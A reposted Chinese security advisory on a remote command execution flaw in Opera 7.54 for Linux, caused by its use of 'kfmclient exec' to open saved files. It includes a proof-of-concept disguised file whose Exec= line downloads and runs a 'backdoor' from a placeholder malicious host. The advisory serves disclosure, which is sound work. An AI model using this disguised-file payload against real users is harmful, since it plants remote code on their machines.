| Opera kfmclient远程任意SHELL命令执行漏洞 |
|
| Opera kfmclient远程任意SHELL命令执行漏洞 |
|
| |
|
受影响系统:
Opera Software Opera Web Browser 7.54
描述:
--------------------------------------------------------------------------------
Opera for Linux使用"kfmclient exec"作为默认应用程序处理保存文件。
"kfmclient exec"在处理文件名时存在问题,远程攻击者可以利用这个漏洞以用户进程权限执行任意SHELL命令。
实际上"kfmclient exec"命令可用于打开"Kde Desktop Entry",然后执行"Exec="中的命令。利用此漏洞需要一个特殊的文件名扩展,如果page.Htm用于文件名,并"kfmclient exec page.Htm"被打开,那么"Exec="中的命令就会执行,相反,如果"page.htm"用于文件名,那么就会作为"kde desktop entry"打开,被konqueror查看,因此如果构建一个名为Image.Jpg文件,包含如下条目:
--------image.Jpg----------
# KDE Config File
[KDE Desktop Entry]
SwallowExec=
SwallowTitle=
BinaryPattern=
MimeType=
Exec=/bin/bash -c
wget\thttp://malicious_site/backdoor;chmod\t777\tbackdoor;./backdoor
Icon=
TerminalOptions=
Path=
Type=Application
Terminal=0
---- end of image.Jpg-------
当目标用户选择"Open"查看image.Jpg时,会被"kfmclient exec"打开而执行SHELL命令。
<*来源:Giovanni Delvecchio (badpenguin79@hotmail.com)
链接:http://marc.theaimsgroup.com/?l=bugtraq&m=110297235619877&w=2
*>
建议:
--------------------------------------------------------------------------------
厂商补丁:
Opera Software
--------------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.opera.com |
 |
频道声明:本频道的文章除部分特别声明禁止转载的专稿外,可以自由转载.但请务必注明出出处和原始作者 文章版权归本频道与文章作者所有.对于被频道转载文章的个人和网站,我们表示深深的谢意。
| 原始作者:佚名 |
录入时间:2006-11-3 |
| 信息来源:不详 |
投稿信箱:itqoo@126.com |
|
|
 |
|
|
| 教程录入:admin 责任编辑:admin |
|
上一个教程: NetWare屏幕保护验证绕过漏洞
下一个教程: Symantec LiveUpdate本地特权提升漏洞 |
| 【字体:小 大】【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口】 |
用户登录 
新用户注册 
网友评论:(只显示最新10条。评论内容只代表网友观点,与本站立场无关!) 